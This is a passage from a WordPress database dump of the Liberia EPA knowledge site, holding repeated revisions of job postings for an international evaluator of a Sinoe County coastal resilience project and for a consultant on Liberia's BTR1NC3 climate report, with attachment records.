lung. Fibers embedded in the lung tissue over time may cause serious lung diseases, including asbestos, lung cancer, or mesothelioma. Smoking increases the risk of developing illness from exposure to asbestos.\r\n\r\n</div>\r\n</div>\r\n</div>','ASBESTOS REGULATION OF LIBERIA','','inherit','closed','closed','','5472-revision-v1','','','2025-06-25 07:48:10','2025-06-25 07:48:10','',5472,'https://ekmsliberia.info/?p=5475',0,'revision','',0),(5476,38,'2025-06-25 09:01:36','2025-06-25 09:01:36','<h3><strong>PROJECT BACKGROUND</strong></h3>\r\n<strong>Project Title</strong>\r\n<p style=\"font-weight: 400;\">Enhancing the Resilience of Vulnerable Coastal Communities in Sinoe County Project</p>\r\n<strong>Project Description</strong>\r\n<p style=\"font-weight: 400;\">The Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity.</p>\r\n<p style=\"font-weight: 400;\">The project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include the following components, outcomes, and outputs:</p>\r\n<p style=\"font-weight: 400;\"><strong>Component 1</strong>: <strong>Institutional capacity strengthening for climate change adaptation planning in Liberia’s coastal counties.</strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 1: Strengthened capacity of all Liberian coastal counties\' planning institutions to assess climate change risks and integrate into county development frameworks.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 1.1. County-level ICZM plans prepared for all coastal counties to address climate hazard risks on infrastructure, livelihoods, and health, as well as to enable adaptation planning, monitoring, protection, and the maintenance of sea and river defence.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.2. Identified climate change risks and adaptation priorities incorporated into coastal County Resilience Plans as well as county and national planning and budgeting processes.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.3. Institutional development planning capacity supported through the establishment and training of cross-sectoral climate change information and risk management focal points and working groups in all coastal counties.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"><strong>Component 2</strong>: <strong>Innovation, technologies, and climate information introduced for coastal adaptation planning. </strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 2. Innovative technologies — including response planning and communication mechanisms — were introduced to support coastal adaptation.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 2.1. Coastal flood and erosion early warning and risk management systems are supported to provide climate information, products, and services that meet the needs of end users.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 2.2. The existing EPA Environmental Knowledge Management System has been enhanced to support the collection and dissemination of lessons learned on sea and river defence based on Sinoe County adaptation solutions.</li>\r\n</ul>\r\n<em><strong>    Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/06/Final-ToR-Mid-Term-Evaluation-International-06232025-PMU.docx\" target=\"_blank\" rel=\"noopener\">Download</a></strong></em>','International Project Evaluation Expert','','publish','closed','closed','','international-project-evaluation-expert','','','2025-06-25 09:32:31','2025-06-25 09:32:31','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5476',57,'ekms_bulletin','',0),(5477,38,'2025-06-25 08:19:28','2025-06-25 08:19:28','','Final ToR Mid-Term Evaluation International 06232025 PMU','','inherit','open','closed','','final-tor-mid-term-evaluation-international-06232025-pmu','','','2025-06-25 08:19:28','2025-06-25 08:19:28','',5476,'https://ekmsliberia.info/wp-content/uploads/2025/06/Final-ToR-Mid-Term-Evaluation-International-06232025-PMU.docx',0,'attachment','application/vnd.openxmlformats-officedocument.wordprocessingml.document',0),(5478,38,'2025-06-25 08:20:56','2025-06-25 08:20:56','<h3><strong>PROJECT BACKGROUND</strong></h3>\r\n<strong>Project Title</strong>\r\n<p style=\"font-weight: 400;\">Enhancing the Resilience of Vulnerable Coastal Communities in Sinoe County Project</p>\r\n<strong>Project Description</strong>\r\n<p style=\"font-weight: 400;\">The Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity.</p>\r\n<p style=\"font-weight: 400;\">The project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include the following components, outcomes, and outputs:</p>\r\n<p style=\"font-weight: 400;\"><strong>Component 1</strong>: <strong>Institutional capacity strengthening for climate change adaptation planning in Liberia’s coastal counties.</strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 1: Strengthened capacity of all Liberian coastal counties\' planning institutions to assess climate change risks and integrate into county development frameworks.</em></p>\r\n<p style=\"font-weight: 400;\"></p>\r\n\r\n<ul>\r\n 	<li>Output 1.1. County-level ICZM plans prepared for all coastal counties to address climate hazard risks on infrastructure, livelihoods, and health, as well as to enable adaptation planning, monitoring, protection, and the maintenance of sea and river defence.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"></p>\r\n\r\n<ul>\r\n 	<li>Output 1.2. Identified climate change risks and adaptation priorities incorporated into coastal County Resilience Plans as well as county and national planning and budgeting processes.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"></p>\r\n\r\n<ul>\r\n 	<li>Output 1.3. Institutional development planning capacity supported through the establishment and training of cross-sectoral climate change information and risk management focal points and working groups in all coastal counties.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"><strong>Component 2</strong>: <strong>Innovation, technologies, and climate information introduced for coastal adaptation planning. </strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 2. Innovative technologies — including response planning and communication mechanisms — were introduced to support coastal adaptation.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 2.1. Coastal flood and erosion early warning and risk management systems are supported to provide climate information, products, and services that meet the needs of end users.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"></p>\r\n\r\n<ul>\r\n 	<li>Output 2.2. The existing EPA Environmental Knowledge Management System has been enhanced to support the collection and dissemination of lessons learned on sea and river defence based on Sinoe County adaptation solutions.</li>\r\n</ul>','International Project Evaluation Expert','','inherit','closed','closed','','5476-revision-v1','','','2025-06-25 08:20:56','2025-06-25 08:20:56','',5476,'https://ekmsliberia.info/?p=5478',0,'revision','',0),(5479,38,'2025-06-25 09:01:36','2025-06-25 09:01:36','<h3><strong>PROJECT BACKGROUND</strong></h3>\r\n<strong>Project Title</strong>\r\n<p style=\"font-weight: 400;\">Enhancing the Resilience of Vulnerable Coastal Communities in Sinoe County Project</p>\r\n<strong>Project Description</strong>\r\n<p style=\"font-weight: 400;\">The Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity.</p>\r\n<p style=\"font-weight: 400;\">The project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include the following components, outcomes, and outputs:</p>\r\n<p style=\"font-weight: 400;\"><strong>Component 1</strong>: <strong>Institutional capacity strengthening for climate change adaptation planning in Liberia’s coastal counties.</strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 1: Strengthened capacity of all Liberian coastal counties\' planning institutions to assess climate change risks and integrate into county development frameworks.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 1.1. County-level ICZM plans prepared for all coastal counties to address climate hazard risks on infrastructure, livelihoods, and health, as well as to enable adaptation planning, monitoring, protection, and the maintenance of sea and river defence.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.2. Identified climate change risks and adaptation priorities incorporated into coastal County Resilience Plans as well as county and national planning and budgeting processes.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.3. Institutional development planning capacity supported through the establishment and training of cross-sectoral climate change information and risk management focal points and working groups in all coastal counties.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"><strong>Component 2</strong>: <strong>Innovation, technologies, and climate information introduced for coastal adaptation planning. </strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 2. Innovative technologies — including response planning and communication mechanisms — were introduced to support coastal adaptation.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 2.1. Coastal flood and erosion early warning and risk management systems are supported to provide climate information, products, and services that meet the needs of end users.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 2.2. The existing EPA Environmental Knowledge Management System has been enhanced to support the collection and dissemination of lessons learned on sea and river defence based on Sinoe County adaptation solutions.</li>\r\n</ul>','International Project Evaluation Expert','','inherit','closed','closed','','5476-revision-v1','','','2025-06-25 09:01:36','2025-06-25 09:01:36','',5476,'https://ekmsliberia.info/?p=5479',0,'revision','',0),(5480,38,'2025-06-25 09:25:22','2025-06-25 09:25:22','<h3><strong>PROJECT BACKGROUND</strong></h3>\n<strong>Project Title</strong>\n<p style=\"font-weight: 400;\">Enhancing the Resilience of Vulnerable Coastal Communities in Sinoe County Project</p>\n<strong>Project Description</strong>\n<p style=\"font-weight: 400;\">The Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity.</p>\n<p style=\"font-weight: 400;\">The project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include the following components, outcomes, and outputs:</p>\n<p style=\"font-weight: 400;\"><strong>Component 1</strong>: <strong>Institutional capacity strengthening for climate change adaptation planning in Liberia’s coastal counties.</strong></p>\n<p style=\"font-weight: 400;\"><em>Outcome 1: Strengthened capacity of all Liberian coastal counties\' planning institutions to assess climate change risks and integrate into county development frameworks.</em></p>\n\n<ul>\n 	<li>Output 1.1. County-level ICZM plans prepared for all coastal counties to address climate hazard risks on infrastructure, livelihoods, and health, as well as to enable adaptation planning, monitoring, protection, and the maintenance of sea and river defence.</li>\n</ul>\n<ul>\n 	<li>Output 1.2. Identified climate change risks and adaptation priorities incorporated into coastal County Resilience Plans as well as county and national planning and budgeting processes.</li>\n</ul>\n<ul>\n 	<li>Output 1.3. Institutional development planning capacity supported through the establishment and training of cross-sectoral climate change information and risk management focal points and working groups in all coastal counties.</li>\n</ul>\n<p style=\"font-weight: 400;\"><strong>Component 2</strong>: <strong>Innovation, technologies, and climate information introduced for coastal adaptation planning. </strong></p>\n<p style=\"font-weight: 400;\"><em>Outcome 2. Innovative technologies — including response planning and communication mechanisms — were introduced to support coastal adaptation.</em></p>\n\n<ul>\n 	<li>Output 2.1. Coastal flood and erosion early warning and risk management systems are supported to provide climate information, products, and services that meet the needs of end users.</li>\n</ul>\n<ul>\n 	<li>Output 2.2. The existing EPA Environmental Knowledge Management System has been enhanced to support the collection and dissemination of lessons learned on sea and river defence based on Sinoe County adaptation solutions.</li>\n</ul>\n<em><strong>Link:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/06/Final-ToR-Mid-Term-Evaluation-International-06232025-PMU.docx\" target=\"_blank\" rel=\"noopener\">Link</a></strong></em>','International Project Evaluation Expert','','inherit','closed','closed','','5476-autosave-v1','','','2025-06-25 09:25:22','2025-06-25 09:25:22','',5476,'https://ekmsliberia.info/?p=5480',0,'revision','',0),(5481,38,'2025-06-25 09:22:56','2025-06-25 09:22:56','<h3><strong>PROJECT BACKGROUND</strong></h3>\r\n<strong>Project Title</strong>\r\n<p style=\"font-weight: 400;\">Enhancing the Resilience of Vulnerable Coastal Communities in Sinoe County Project</p>\r\n<strong>Project Description</strong>\r\n<p style=\"font-weight: 400;\">The Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity.</p>\r\n<p style=\"font-weight: 400;\">The project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include the following components, outcomes, and outputs:</p>\r\n<p style=\"font-weight: 400;\"><strong>Component 1</strong>: <strong>Institutional capacity strengthening for climate change adaptation planning in Liberia’s coastal counties.</strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 1: Strengthened capacity of all Liberian coastal counties\' planning institutions to assess climate change risks and integrate into county development frameworks.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 1.1. County-level ICZM plans prepared for all coastal counties to address climate hazard risks on infrastructure, livelihoods, and health, as well as to enable adaptation planning, monitoring, protection, and the maintenance of sea and river defence.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.2. Identified climate change risks and adaptation priorities incorporated into coastal County Resilience Plans as well as county and national planning and budgeting processes.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.3. Institutional development planning capacity supported through the establishment and training of cross-sectoral climate change information and risk management focal points and working groups in all coastal counties.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"><strong>Component 2</strong>: <strong>Innovation, technologies, and climate information introduced for coastal adaptation planning. </strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 2. Innovative technologies — including response planning and communication mechanisms — were introduced to support coastal adaptation.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 2.1. Coastal flood and erosion early warning and risk management systems are supported to provide climate information, products, and services that meet the needs of end users.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 2.2. The existing EPA Environmental Knowledge Management System has been enhanced to support the collection and dissemination of lessons learned on sea and river defence based on Sinoe County adaptation solutions.</li>\r\n</ul>\r\n<em><strong>Link:</strong></em>','International Project Evaluation Expert','','inherit','closed','closed','','5476-revision-v1','','','2025-06-25 09:22:56','2025-06-25 09:22:56','',5476,'https://ekmsliberia.info/?p=5481',0,'revision','',0),(5482,38,'2025-06-25 09:26:18','2025-06-25 09:26:18','<h3><strong>PROJECT BACKGROUND</strong></h3>\r\n<strong>Project Title</strong>\r\n<p style=\"font-weight: 400;\">Enhancing the Resilience of Vulnerable Coastal Communities in Sinoe County Project</p>\r\n<strong>Project Description</strong>\r\n<p style=\"font-weight: 400;\">The Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity.</p>\r\n<p style=\"font-weight: 400;\">The project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include the following components, outcomes, and outputs:</p>\r\n<p style=\"font-weight: 400;\"><strong>Component 1</strong>: <strong>Institutional capacity strengthening for climate change adaptation planning in Liberia’s coastal counties.</strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 1: Strengthened capacity of all Liberian coastal counties\' planning institutions to assess climate change risks and integrate into county development frameworks.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 1.1. County-level ICZM plans prepared for all coastal counties to address climate hazard risks on infrastructure, livelihoods, and health, as well as to enable adaptation planning, monitoring, protection, and the maintenance of sea and river defence.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.2. Identified climate change risks and adaptation priorities incorporated into coastal County Resilience Plans as well as county and national planning and budgeting processes.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.3. Institutional development planning capacity supported through the establishment and training of cross-sectoral climate change information and risk management focal points and working groups in all coastal counties.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"><strong>Component 2</strong>: <strong>Innovation, technologies, and climate information introduced for coastal adaptation planning. </strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 2. Innovative technologies — including response planning and communication mechanisms — were introduced to support coastal adaptation.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 2.1. Coastal flood and erosion early warning and risk management systems are supported to provide climate information, products, and services that meet the needs of end users.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 2.2. The existing EPA Environmental Knowledge Management System has been enhanced to support the collection and dissemination of lessons learned on sea and river defence based on Sinoe County adaptation solutions.</li>\r\n</ul>\r\n<em><strong>Link:<a href=\"https://ekmsliberia.info/wp-content/uploads/2025/06/Final-ToR-Mid-Term-Evaluation-International-06232025-PMU.docx\" target=\"_blank\" rel=\"noopener\">Download</a></strong></em>','International Project Evaluation Expert','','inherit','closed','closed','','5476-revision-v1','','','2025-06-25 09:26:18','2025-06-25 09:26:18','',5476,'https://ekmsliberia.info/?p=5482',0,'revision','',0),(5483,38,'2025-06-25 09:32:31','2025-06-25 09:32:31','<h3><strong>PROJECT BACKGROUND</strong></h3>\r\n<strong>Project Title</strong>\r\n<p style=\"font-weight: 400;\">Enhancing the Resilience of Vulnerable Coastal Communities in Sinoe County Project</p>\r\n<strong>Project Description</strong>\r\n<p style=\"font-weight: 400;\">The Government of Liberia (GoL), through the EPA and the United Nations Development Program (UNDP), and with funding from the Global Environmental Facility (GEF), received funding for the project “Enhancing Resilience of Vulnerable Coastal Communities in Sinoe County of Liberia (ERVCCS).” EPA is the project\'s Executing Entity.</p>\r\n<p style=\"font-weight: 400;\">The project aims to build on existing projects to strengthen the resilience of vulnerable coastal communities and their livelihoods to the impacts of climate change, focusing on women and youths. Specifically, project interventions include the following components, outcomes, and outputs:</p>\r\n<p style=\"font-weight: 400;\"><strong>Component 1</strong>: <strong>Institutional capacity strengthening for climate change adaptation planning in Liberia’s coastal counties.</strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 1: Strengthened capacity of all Liberian coastal counties\' planning institutions to assess climate change risks and integrate into county development frameworks.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 1.1. County-level ICZM plans prepared for all coastal counties to address climate hazard risks on infrastructure, livelihoods, and health, as well as to enable adaptation planning, monitoring, protection, and the maintenance of sea and river defence.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.2. Identified climate change risks and adaptation priorities incorporated into coastal County Resilience Plans as well as county and national planning and budgeting processes.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 1.3. Institutional development planning capacity supported through the establishment and training of cross-sectoral climate change information and risk management focal points and working groups in all coastal counties.</li>\r\n</ul>\r\n<p style=\"font-weight: 400;\"><strong>Component 2</strong>: <strong>Innovation, technologies, and climate information introduced for coastal adaptation planning. </strong></p>\r\n<p style=\"font-weight: 400;\"><em>Outcome 2. Innovative technologies — including response planning and communication mechanisms — were introduced to support coastal adaptation.</em></p>\r\n\r\n<ul>\r\n 	<li>Output 2.1. Coastal flood and erosion early warning and risk management systems are supported to provide climate information, products, and services that meet the needs of end users.</li>\r\n</ul>\r\n<ul>\r\n 	<li>Output 2.2. The existing EPA Environmental Knowledge Management System has been enhanced to support the collection and dissemination of lessons learned on sea and river defence based on Sinoe County adaptation solutions.</li>\r\n</ul>\r\n<em><strong>    Link: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/06/Final-ToR-Mid-Term-Evaluation-International-06232025-PMU.docx\" target=\"_blank\" rel=\"noopener\">Download</a></strong></em>','International Project Evaluation Expert','','inherit','closed','closed','','5476-revision-v1','','','2025-06-25 09:32:31','2025-06-25 09:32:31','',5476,'https://ekmsliberia.info/?p=5483',0,'revision','',0),(5484,38,'2025-06-26 11:10:58','2025-06-26 11:10:58','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>BACKGROUND</strong>\r\n<div class=\"page\" title=\"Page 1\">\r\n<div class=\"section\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe Environmental Protection Agency is the national designated authority responsible for the implementation of international environment treaties to which Liberia is a Party. Within the EPA, there exists a Climate Change Enabling Unit responsible for activities related to the preparation of National Communications (NCs); Biennial Transparency Reports (BTRs); and Greenhouse Gas (GHG) National Inventory Reports (NIRs) of the Republic of Liberia in fulfilment of our national obligations to the UNFCCC. The Unit is also responsible for monitoring climate change related activities/projects and their execution on behalf of the EPA.\r\n\r\nThe content of deliverables produced under this output must follow the Modalities, Procedures and Guidelines for the transparency framework for action and support referred to in Article 13 of the Paris Agreement (FCCC/PA/CMA/2018/3/Add.2). Moreover, as adopted at COP 26 in Decision 5/CMA.3, the following will be observed: (i) outlines for the BTR &amp; national inventory document (NIR); (ii) the common reporting tables and common tabular formats for reporting GHG Inventory, NDC progress, financial, technology development and transfer and capacity-building support provided and mobilized, as well as support needed and received (FCCC/PA/CMA/2021/10/Add.2).\r\n\r\nLiberia’s BTR1NC3 is building on findings and recommendations from previous NCs and the BUR1 as well as recommendations resulting from the International Consultation and Analysis (ICA) process. It specifically addresses (i) national inventory report of anthropogenic emissions by sources and removals by sinks of greenhouse gases; (i) information necessary to track progress made in implementing and achieving nationally determined contributions under Article 4 of the Paris Agreement; (iii) information related to climate change impacts and adaptation under Article 7 of the Paris Agreement; (iv) information on financial, technology development and transfer and capacity-building support needed and received under Articles 9–11 of the Paris Agreement; (v) Other relevant information (e.g. gender, RSO, education/training and public awareness).\r\n\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nOBJECTIVE\r\n\r\nSpecifically, the consultant will review, and update the data used in the draft BTR1NC3. This will lead to the preparation of the final draft for submission to the UNFCCC in fulfillment of national reporting obligations.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/06/Terms-of-Reference-BTR1NC3-Finalization-of-Reports-for-Submission_EPALiberia.pdf\" target=\"_blank\" rel=\"noopener\">Download</a>\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Consultancy to Conduct Technical Evaluation and TACCC Check on the Zero Draft of Liberia’s BTR1NC3','','publish','closed','closed','','consultancy-to-conduct-technical-evaluation-and-taccc-check-on-the-zero-draft-of-liberias-btr1nc3','','','2025-06-26 11:18:47','2025-06-26 11:18:47','',0,'https://ekmsliberia.info/?post_type=ekms_bulletin&#038;p=5484',56,'ekms_bulletin','',0),(5485,38,'2025-06-26 11:08:54','2025-06-26 11:08:54','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>BACKGROUND</strong>\r\n<div class=\"page\" title=\"Page 1\">\r\n<div class=\"section\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe Environmental Protection Agency is the national designated authority responsible for the implementation of international environment treaties to which Liberia is a Party. Within the EPA, there exists a Climate Change Enabling Unit responsible for activities related to the preparation of National Communications (NCs); Biennial Transparency Reports (BTRs); and Greenhouse Gas (GHG) National Inventory Reports (NIRs) of the Republic of Liberia in fulfilment of our national obligations to the UNFCCC. The Unit is also responsible for monitoring climate change related activities/projects and their execution on behalf of the EPA.\r\n\r\nThe content of deliverables produced under this output must follow the Modalities, Procedures and Guidelines for the transparency framework for action and support referred to in Article 13 of the Paris Agreement (FCCC/PA/CMA/2018/3/Add.2). Moreover, as adopted at COP 26 in Decision 5/CMA.3, the following will be observed: (i) outlines for the BTR &amp; national inventory document (NIR); (ii) the common reporting tables and common tabular formats for reporting GHG Inventory, NDC progress, financial, technology development and transfer and capacity-building support provided and mobilized, as well as support needed and received (FCCC/PA/CMA/2021/10/Add.2).\r\n\r\nLiberia’s BTR1NC3 is building on findings and recommendations from previous NCs and the BUR1 as well as recommendations resulting from the International Consultation and Analysis (ICA) process. It specifically addresses (i) national inventory report of anthropogenic emissions by sources and removals by sinks of greenhouse gases; (i) information necessary to track progress made in implementing and achieving nationally determined contributions under Article 4 of the Paris Agreement; (iii) information related to climate change impacts and adaptation under Article 7 of the Paris Agreement; (iv) information on financial, technology development and transfer and capacity-building support needed and received under Articles 9–11 of the Paris Agreement; (v) Other relevant information (e.g. gender, RSO, education/training and public awareness).\r\n\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nOBJECTIVE\r\n\r\nSpecifically, the consultant will review, and update the data used in the draft BTR1NC3. This will lead to the preparation of the final draft for submission to the UNFCCC in fulfillment of national reporting obligations.\r\n\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>','Consultancy to Conduct Technical Evaluation and TACCC Check on the Zero Draft of Liberia’s BTR1NC3','','inherit','closed','closed','','5484-revision-v1','','','2025-06-26 11:08:54','2025-06-26 11:08:54','',5484,'https://ekmsliberia.info/?p=5485',0,'revision','',0),(5486,38,'2025-06-26 11:09:57','2025-06-26 11:09:57','','Terms of Reference - BTR1NC3 Finalization of Reports for Submission_EPALiberia','','inherit','open','closed','','terms-of-reference-btr1nc3-finalization-of-reports-for-submission_epaliberia','','','2025-06-26 11:09:57','2025-06-26 11:09:57','',0,'https://ekmsliberia.info/wp-content/uploads/2025/06/Terms-of-Reference-BTR1NC3-Finalization-of-Reports-for-Submission_EPALiberia.pdf',0,'attachment','application/pdf',0),(5487,38,'2025-06-26 11:17:09','2025-06-26 11:17:09','<div class=\"page\" title=\"Page 1\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n\n<strong>BACKGROUND</strong>\n<div class=\"page\" title=\"Page 1\">\n<div class=\"section\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n\nThe Environmental Protection Agency is the national designated authority responsible for the implementation of international environment treaties to which Liberia is a Party. Within the EPA, there exists a Climate Change Enabling Unit responsible for activities related to the preparation of National Communications (NCs); Biennial Transparency Reports (BTRs); and Greenhouse Gas (GHG) National Inventory Reports (NIRs) of the Republic of Liberia in fulfilment of our national obligations to the UNFCCC. The Unit is also responsible for monitoring climate change related activities/projects and their execution on behalf of the EPA.\n\nThe content of deliverables produced under this output must follow the Modalities, Procedures and Guidelines for the transparency framework for action and support referred to in Article 13 of the Paris Agreement (FCCC/PA/CMA/2018/3/Add.2). Moreover, as adopted at COP 26 in Decision 5/CMA.3, the following will be observed: (i) outlines for the BTR &amp; national inventory document (NIR); (ii) the common reporting tables and common tabular formats for reporting GHG Inventory, NDC progress, financial, technology development and transfer and capacity-building support provided and mobilized, as well as support needed and received (FCCC/PA/CMA/2021/10/Add.2).\n\nLiberia’s BTR1NC3 is building on findings and recommendations from previous NCs and the BUR1 as well as recommendations resulting from the International Consultation and Analysis (ICA) process. It specifically addresses (i) national inventory report of anthropogenic emissions by sources and removals by sinks of greenhouse gases; (i) information necessary to track progress made in implementing and achieving nationally determined contributions under Article 4 of the Paris Agreement; (iii) information related to climate change impacts and adaptation under Article 7 of the Paris Agreement; (iv) information on financial, technology development and transfer and capacity-building support needed and received under Articles 9–11 of the Paris Agreement; (v) Other relevant information (e.g. gender, RSO, education/training and public awareness).\n\n</div>\n<div class=\"page\" title=\"Page 2\">\n<div class=\"layoutArea\">\n<div class=\"column\">\n\nOBJECTIVE\n\nSpecifically, the consultant will review, and update the data used in the draft BTR1NC3. This will lead to the preparation of the final draft for submission to the UNFCCC in fulfillment of national reporting obligations.\n\n&nbsp;\n\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>\n</div>','Consultancy to Conduct Technical Evaluation and TACCC Check on the Zero Draft of Liberia’s BTR1NC3','','inherit','closed','closed','','5484-autosave-v1','','','2025-06-26 11:17:09','2025-06-26 11:17:09','',5484,'https://ekmsliberia.info/?p=5487',0,'revision','',0),(5488,38,'2025-06-26 11:17:42','2025-06-26 11:17:42','<div class=\"page\" title=\"Page 1\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\n<strong>BACKGROUND</strong>\r\n<div class=\"page\" title=\"Page 1\">\r\n<div class=\"section\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nThe Environmental Protection Agency is the national designated authority responsible for the implementation of international environment treaties to which Liberia is a Party. Within the EPA, there exists a Climate Change Enabling Unit responsible for activities related to the preparation of National Communications (NCs); Biennial Transparency Reports (BTRs); and Greenhouse Gas (GHG) National Inventory Reports (NIRs) of the Republic of Liberia in fulfilment of our national obligations to the UNFCCC. The Unit is also responsible for monitoring climate change related activities/projects and their execution on behalf of the EPA.\r\n\r\nThe content of deliverables produced under this output must follow the Modalities, Procedures and Guidelines for the transparency framework for action and support referred to in Article 13 of the Paris Agreement (FCCC/PA/CMA/2018/3/Add.2). Moreover, as adopted at COP 26 in Decision 5/CMA.3, the following will be observed: (i) outlines for the BTR &amp; national inventory document (NIR); (ii) the common reporting tables and common tabular formats for reporting GHG Inventory, NDC progress, financial, technology development and transfer and capacity-building support provided and mobilized, as well as support needed and received (FCCC/PA/CMA/2021/10/Add.2).\r\n\r\nLiberia’s BTR1NC3 is building on findings and recommendations from previous NCs and the BUR1 as well as recommendations resulting from the International Consultation and Analysis (ICA) process. It specifically addresses (i) national inventory report of anthropogenic emissions by sources and removals by sinks of greenhouse gases; (i) information necessary to track progress made in implementing and achieving nationally determined contributions under Article 4 of the Paris Agreement; (iii) information related to climate change impacts and adaptation under Article 7 of the Paris Agreement; (iv) information on financial, technology development and transfer and capacity-building support needed and received under Articles 9–11 of the Paris Agreement; (v) Other relevant information (e.g. gender, RSO, education/training and public awareness).\r\n\r\n</div>\r\n<div class=\"page\" title=\"Page 2\">\r\n<div class=\"layoutArea\">\r\n<div class=\"column\">\r\n\r\nOBJECTIVE\r\n\r\nSpecifically, the consultant will review, and update the data used in the draft BTR1NC3. This will lead to the preparation of the final draft for submission to the UNFCCC in fulfillment of national reporting obligations.\r\n\r\nLink: <a href=\"https://ekmsliberia.info/wp-content/uploads/2025/06/Terms-of-Reference-BTR1NC3-Finalization-of-Reports-for-Submission_EPALiberia.pdf\" target=\"_blank\" 